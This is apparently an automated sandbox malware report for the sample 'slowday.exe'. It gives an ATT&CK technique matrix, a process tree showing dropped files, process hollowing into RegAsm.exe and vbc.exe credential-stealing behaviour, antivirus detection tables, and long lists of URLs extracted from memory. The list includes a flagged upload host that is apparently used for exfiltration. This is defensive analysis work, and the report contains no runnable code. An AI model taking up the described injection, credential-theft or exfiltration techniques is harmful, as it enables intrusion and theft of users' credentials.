            Domain Accounts | [1] Shared Modules | Logon Script (Windows) | [4 1 2] Process Injection | [2] Obfuscated Files or Information | [1] Credentials in Registry | [9] System Information Discovery | SMB/Windows Admin Shares | [1] Email Collection | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
            Local Accounts | At (Windows) | Logon Script (Mac) | [2] Registry Run Keys / Startup Folder | [1] Software Packing | [1] Credentials In Files | [2 6 1] Security Software Discovery | Distributed Component Object Model | [2 1] Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | - | Carrier Billing Fraud
            Cloud Accounts | Cron | Network Logon Script | Network Logon Script | [1] DLL Side-Loading | LSA Secrets | [1 4 1] Virtualization/Sandbox Evasion | SSH | [2] Clipboard Data | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | - | Manipulate App Store Rankings or Ratings
            Replication Through Removable Media | Launchd | Rc.common | Rc.common | [1] Masquerading | Cached Domain Credentials | [4] Process Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | - | Abuse Accessibility Features
            External Remote Services | Scheduled Task | Startup Items | Startup Items | [1 4 1] Virtualization/Sandbox Evasion | DCSync | [1] Application Window Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | - | Data Encrypted for Impact
            Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | [1] Access Token Manipulation | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | - | Generate Fraudulent Advertising Revenue
            Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | [4 1 2] Process Injection | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | - | Data Destruction
            Behavior Graph (ID: 614362, Sample: slowday.exe, Start date: 23/04/2022, Architecture: WINDOWS, Score: 100)

            Graph-level signatures: Multi AV Scanner detection for domain / URL; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 12 other signatures

            Process tree recovered from the graph:
            slowday.exe (started)
                dropped: C:\Users\user\AppData\...\winlogons.exe, PE32
                dropped: C:\Users\user\AppData\...\winlogons.url, MS
                RegAsm.exe (started)
                    signatures: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Injects a PE file into a foreign processes
                    vbc.exe (started)
                        signatures: Tries to steal Instant Messenger accounts or passwords; Tries to steal Mail credentials (via file / registry access)
                    vbc.exe (started)
                    vbc.exe (started)
                    vbc.exe (started)
            winlogons.exe (started)
                signatures: Antivirus detection for dropped file
                RegAsm.exe (started)
                    signatures: Writes to foreign memory regions; Allocates memory in foreign processes; Sample uses process hollowing technique
                    vbc.exe (started)
                    vbc.exe (started)
                        signatures: Tries to harvest and steal browser information (history, passwords, etc)
                    vbc.exe (started)
                        network: 192.168.2.1 (unknown, unknown)
                    2 other processes

            Source | Detection | Scanner | Label
            slowday.exe | 75% | Virustotal | -
            slowday.exe | 74% | ReversingLabs | Win32.Trojan.Autoit
            slowday.exe | 100% | Avira | DR/AutoIt.Gen8
            Source | Detection | Scanner | Label
            C:\Users\user\AppData\Roaming\winlogons\winlogons.exe | 100% | Avira | DR/AutoIt.Gen8
            Source | Detection | Scanner | Label
            0.2.slowday.exe.dc0000.0.unpack | 100% | Avira | DR/AutoIt.Gen8
            2.0.vbc.exe.400000.4.unpack | 100% | Avira | HEUR/AGEN.1227086
            6.0.vbc.exe.400000.1.unpack | 100% | Avira | HEUR/AGEN.1227086
            9.0.vbc.exe.400000.1.unpack | 100% | Avira | HEUR/AGEN.1227086
            10.0.vbc.exe.400000.3.unpack | 100% | Avira | HEUR/AGEN.1227086
            21.0.vbc.exe.400000.2.unpack | 100% | Avira | HEUR/AGEN.1227086
            23.2.vbc.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1227086
            2.2.vbc.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1227086
            19.0.vbc.exe.400000.2.unpack | 100% | Avira | HEUR/AGEN.1227086
            2.0.vbc.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1227086
            6.0.vbc.exe.400000.4.unpack | 100% | Avira | HEUR/AGEN.1227086
            23.0.vbc.exe.400000.3.unpack | 100% | Avira | HEUR/AGEN.1227086
            21.0.vbc.exe.400000.1.unpack | 100% | Avira | HEUR/AGEN.1227086
            7.0.winlogons.exe.1280000.0.unpack | 100% | Avira | DR/AutoIt.Gen8
            19.0.vbc.exe.400000.5.unpack | 100% | Avira | HEUR/AGEN.1227086
            21.0.vbc.exe.400000.3.unpack | 100% | Avira | HEUR/AGEN.1227086
            7.2.winlogons.exe.1280000.0.unpack | 100% | Avira | DR/AutoIt.Gen8
            1.0.RegAsm.exe.400000.0.unpack | 100% | Avira | TR/Dropper.Gen
            1.2.RegAsm.exe.400000.0.unpack | 100% | Avira | TR/Dropper.Gen
            23.0.vbc.exe.400000.2.unpack | 100% | Avira | HEUR/AGEN.1227086
            21.2.vbc.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1227086
            21.0.vbc.exe.400000.4.unpack | 100% | Avira | HEUR/AGEN.1227086
            23.0.vbc.exe.400000.1.unpack | 100% | Avira | HEUR/AGEN.1227086
            7.3.winlogons.exe.3790000.0.unpack | 100% | Avira | TR/Dropper.Gen
            23.0.vbc.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1227086
            9.0.vbc.exe.400000.2.unpack | 100% | Avira | HEUR/AGEN.1227086
            10.2.vbc.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1227086
            10.0.vbc.exe.400000.1.unpack | 100% | Avira | HEUR/AGEN.1227086
            9.2.vbc.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1227086
            2.0.vbc.exe.400000.5.unpack | 100% | Avira | HEUR/AGEN.1227086
            6.2.vbc.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1227086
            10.0.vbc.exe.400000.2.unpack | 100% | Avira | HEUR/AGEN.1227086
            8.0.RegAsm.exe.400000.0.unpack | 100% | Avira | TR/Dropper.Gen
            10.0.vbc.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1227086
            19.0.vbc.exe.400000.1.unpack | 100% | Avira | HEUR/AGEN.1227086
            19.0.vbc.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1227086
            19.0.vbc.exe.400000.4.unpack | 100% | Avira | HEUR/AGEN.1227086
            9.0.vbc.exe.400000.4.unpack | 100% | Avira | HEUR/AGEN.1227086
            23.0.vbc.exe.400000.4.unpack | 100% | Avira | HEUR/AGEN.1227086
            21.0.vbc.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1227086
            6.0.vbc.exe.400000.5.unpack | 100% | Avira | HEUR/AGEN.1227086
            6.0.vbc.exe.400000.3.unpack | 100% | Avira | HEUR/AGEN.1227086
            21.0.vbc.exe.400000.5.unpack | 100% | Avira | HEUR/AGEN.1227086
            8.2.RegAsm.exe.400000.0.unpack | 100% | Avira | TR/Dropper.Gen
            10.0.vbc.exe.400000.5.unpack | 100% | Avira | HEUR/AGEN.1227086
            19.2.vbc.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1227086
            6.0.vbc.exe.400000.2.unpack | 100% | Avira | HEUR/AGEN.1227086
            9.0.vbc.exe.400000.5.unpack | 100% | Avira | HEUR/AGEN.1227086
            6.0.vbc.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1227086
            2.0.vbc.exe.400000.2.unpack | 100% | Avira | HEUR/AGEN.1227086
            0.3.slowday.exe.3b50000.0.unpack | 100% | Avira | TR/Dropper.Gen
            8.0.RegAsm.exe.400000.1.unpack | 100% | Avira | TR/Dropper.Gen
            0.0.slowday.exe.dc0000.0.unpack | 100% | Avira | DR/AutoIt.Gen8
            23.0.vbc.exe.400000.5.unpack | 100% | Avira | HEUR/AGEN.1227086
            2.0.vbc.exe.400000.1.unpack | 100% | Avira | HEUR/AGEN.1227086
            10.0.vbc.exe.400000.4.unpack | 100% | Avira | HEUR/AGEN.1227086
            9.0.vbc.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1227086
            1.0.RegAsm.exe.400000.1.unpack | 100% | Avira | TR/Dropper.Gen
            19.0.vbc.exe.400000.3.unpack | 100% | Avira | HEUR/AGEN.1227086
            9.0.vbc.exe.400000.3.unpack | 100% | Avira | HEUR/AGEN.1227086
            2.0.vbc.exe.400000.3.unpack | 100% | Avira | HEUR/AGEN.1227086
            No Antivirus matches
            Source | Detection | Scanner | Label
            https://deff.nelreports.net/api/report?cat=msn | 0% | URL Reputation | safe
            https://a.pomf.cat/ | 4% | Virustotal | -
            https://a.pomf.cat/ | 100% | Avira URL Cloud | phishing
            http://crl.pki.goog/GTS1O1core.crl0 | 0% | URL Reputation | safe
            http://pki.goog/gsr2/GTS1O1.crt0 | 0% | URL Reputation | safe
            https://pki.goog/repository/0 | 0% | URL Reputation | safe
            http://crl.pki.goog/gsr2/gsr2.crl0? | 0% | URL Reputation | safe
            http://pki.goog/gsr2/GTSGIAG3.crt0) | 0% | URL Reputation | safe
            http://pki.goog/gsr2/GTS1O1.crt0# | 0% | URL Reputation | safe
            http://pomf.cat/upload.php&https://a.pomf.cat/ | 0% | Avira URL Cloud | safe
            https://aefd.nelreports.net/api/report?cat=bingth | 0% | URL Reputation | safe
            http://pomf.cat/upload.php | 8% | Virustotal | -
            http://pomf.cat/upload.php | 100% | Avira URL Cloud | malware
            http://crl.pki.goog/GTSGIAG3.crl0 | 0% | URL Reputation | safe
            https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gt | 0% | URL Reputation | safe
            http://pki.goog/gsr2/GTS1O1.crt0M | 0% | URL Reputation | safe
            https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au | 0% | URL Reputation | safe
            https://aefd.nelreports.net/api/report?cat=bingaot | 0% | URL Reputation | safe
            No contacted domains info
            Name | Source | Malicious | Antivirus Detection | Reputation
            http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/scripttemplate | bhvBB7.tmp.21.dr, bhvAE74.tmp.6.dr | false | - | high
            https://www.google.com/chrome/static/images/folder-applications.svg | bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr | false | - | high
            https://www.google.com/chrome/static/css/main.v2.min.css | bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr | false | - | high
            https://www.google.com/chrome/static/images/fallback/google-chrome-logo.jpg | bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr | false | - | high
            http://www.msn.com | bhvBB7.tmp.21.dr | false | - | high
            http://www.nirsoft.net | vbc.exe, 00000002.00000002.260540499.000000000019C000.00000004.00000010.00020000.00000000.sdmp, vbc.exe, 00000006.00000002.282611989.0000000000195000.00000004.00000010.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.299301709.000000000019C000.00000004.00000010.00020000.00000000.sdmp, vbc.exe, 0000000A.00000002.301868471.0000000000195000.00000004.00000010.00020000.00000000.sdmp, vbc.exe, 00000013.00000002.320171342.000000000019C000.00000004.00000010.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.333176153.000000000019C000.00000004.00000010.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.346821134.000000000019C000.00000004.00000010.00020000.00000000.sdmp | false | - | high
            https://deff.nelreports.net/api/report?cat=msn | bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.dr | false | URL Reputation: safe | unknown
            https://www.google.com/chrome/static/images/chrome-logo.svg | bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr | false | - | high
            https://www.google.com/chrome/static/images/homepage/homepage_features.png | bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr | false | - | high
            https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm= | vbc.exe, 00000002.00000003.258299011.0000000002403000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000003.279720385.0000000002253000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.296935342.00000000009F3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000A.00000003.298367793.0000000002273000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317442987.0000000000B13000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317243581.0000000000B1F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317551848.0000000000B16000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330335206.0000000000B2F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330801205.0000000000B23000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330817825.0000000000B26000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.343596388.0000000002206000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.343230278.000000000220F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.343529640.0000000002203000.00000004.00000800.00020000.00000000.sdmp, bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr | false | - | high
            https://www.google.com/chrome/static/images/download-browser/big_pixel_phone.png | bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr | false | - | high
            https://www.google.com/chrome/ | vbc.exe, 00000002.00000003.258216058.0000000002403000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.258299011.0000000002403000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000003.279720385.0000000002253000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000003.279640260.0000000002253000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.296935342.00000000009F3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.296911055.00000000009F3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000A.00000003.298367793.0000000002273000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000A.00000003.298255280.0000000002273000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317442987.0000000000B13000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317243581.0000000000B1F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317218748.0000000000B16000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317551848.0000000000B16000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317159848.0000000000B13000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317103637.0000000000B1F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330049242.0000000000B2F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330335206.0000000000B2F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330268926.0000000000B26000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330801205.0000000000B23000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330228924.0000000000B23000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330817825.0000000000B26000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 
00000017.00000003.343596388.0000000002206000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://a.pomf.cat/RegAsm.exe, 00000001.00000002.506893790.0000000002F63000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.506835059.0000000002B03000.00000004.00000800.00020000.00000000.sdmptrue
                                  • 4%, Virustotal, Browse
                                  • Avira URL Cloud: phishing
                                  unknown
                                  https://2542116.fls.doubleclick.net/activityi;src22vbc.exe, 0000000A.00000002.302284910.00000000008F0000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000013.00000002.320338542.0000000000B50000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.333369197.0000000000BA0000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.347050996.0000000000980000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc13122162a9a46c3b4cbf05ffccde0fbhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                                      high
                                      https://www.google.com/chrome/static/images/homepage/hero-anim-bottom-left.pngbhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                                        high
                                        https://www.google.com/chrome/static/images/chrome_safari-behavior.jpgbhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                                          high
                                          https://login.microsoftonline.com/common/oauth2/authorizeclient_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e3vbc.exe, 00000002.00000003.258804359.00000000028EB000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000003.280774085.00000000027EB000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.297394519.000000000275B000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://maps.windows.com/windows-app-web-linkbhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                                              high
                                              http://www.msn.com/?ocid=iehpvbc.exe, 00000002.00000003.258216058.0000000002403000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.258299011.0000000002403000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000003.279720385.0000000002253000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000003.279640260.0000000002253000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.296935342.00000000009F3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.296911055.00000000009F3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000A.00000003.298367793.0000000002273000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000A.00000003.298255280.0000000002273000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317442987.0000000000B13000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317218748.0000000000B16000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317551848.0000000000B16000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317159848.0000000000B13000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330268926.0000000000B26000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330801205.0000000000B23000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330228924.0000000000B23000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330817825.0000000000B26000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.343596388.0000000002206000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.343153268.0000000002203000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.343183877.0000000002206000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.343529640.0000000002203000.00000004.00000800.00020000.00000000.sdmp, 
bhv2307.tmp.23.drfalse
                                                high
                                                https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=68568119166vbc.exe, 00000002.00000003.258299011.0000000002403000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.261431821.00000000028EC000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000002.282897476.00000000027EC000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000003.279720385.0000000002253000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.296935342.00000000009F3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.299972783.000000000275C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000A.00000003.298367793.0000000002273000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317442987.0000000000B13000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317243581.0000000000B1F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317551848.0000000000B16000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317402049.0000000000B25000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330335206.0000000000B2F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330749808.0000000000B35000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330801205.0000000000B23000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330817825.0000000000B26000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.343596388.0000000002206000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.343230278.000000000220F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.343427835.0000000002215000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.343529640.0000000002203000.00000004.00000800.00020000.00000000.sdmp, bhv2307.tmp.23.dr, 
bhvCA97.tmp.9.drfalse
                                                  high
                                                  https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCee0d4d5fd4424c8390d703b105f82c3bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                                                    high
                                                    https://srtb.msn.com/auction?a=de-ch&b=a8415ac9f9644a1396bc1648a4599445&c=MSN&d=http%3A%2F%2Fwww.msnbhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                                                      high
                                                      http://crl.pki.goog/GTS1O1core.crl0bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://www.google.com/chrome/static/images/icon-announcement.svgbhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                                                        high
                                                        https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://cvbc.exe, 00000017.00000003.343427835.0000000002215000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.345265864.0000000002214000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://www.nirsoft.net/vbc.exe, 00000023.00000000.476081488.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                            high
                                                            https://www.google.com/chrome/static/images/homepage/hero-anim-middle.pngbhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                                                              high
                                                              https://www.google.com/chrome/static/css/main.v3.min.cssbhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                                                                high
                                                                https://www.google.com/chrome/application/x-msdownloadC:bhvBB7.tmp.21.drfalse
                                                                  high
                                                                  https://www.google.com/chrome/static/images/fallback/icon-file-download.jpgbhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                                                                    high
                                                                    https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC5bdddb231cf54f958a5b6e76e9d8eeebhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                                                                      high
                                                                      https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=447687274835vbc.exe, 00000002.00000002.261371537.0000000000B8A000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.260277725.0000000000B89000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000006.00000003.282395197.00000000005F9000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000006.00000002.282748053.00000000005FA000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.298779879.0000000000A49000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.299948440.0000000000A4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://www.google.com/chrome/static/images/download-browser/pixel_phone.pngbhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                                                                          high
                                                                          http://pki.goog/gsr2/GTS1O1.crt0bhvBB7.tmp.21.drfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1bhvBB7.tmp.21.drfalse
                                                                            high
                                                                            https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xmlbhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                                                                              high
                                                                              https://www.google.com/chrome/static/images/app-store-download.pngbhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                                                                                high
                                                                                https://www.google.com/chrome/static/images/homepage/hero-anim-top-right.pngbhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                                                                                  high
                                                                                  https://contextual.media.net/bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                                                                                    high
                                                                                    https://pki.goog/repository/0bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drfalse
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    https://cvision.media.net/new/300x300/3/167/174/27/39ab3103-8560-4a55-bfc4-401f897cf6f2.jpg?v=9bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                                                                                      high
                                                                                      http://www.msn.com/bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                                                                                        high
                                                                                        https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC828bc1cde9f04b788c98b5423157734bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                                                                                          high
                                                                                          https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674bhvBB7.tmp.21.drfalse
                                                                                            high
                                                                                            https://www.google.com/chrome/static/images/fallback/google-logo-one-color.jpgbhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                                                                                              high
                                                                                              https://www.google.com/chrome/static/images/fallback/icon-twitter.jpgbhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                                                                                                high
                                                                                                http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/consent/55a804bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drfalse
                                                                                                  high
                                                                                                  https://contextual.media.net/803288796/fcmain.js?&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3bhvBB7.tmp.21.drfalse
                                                                                                    high
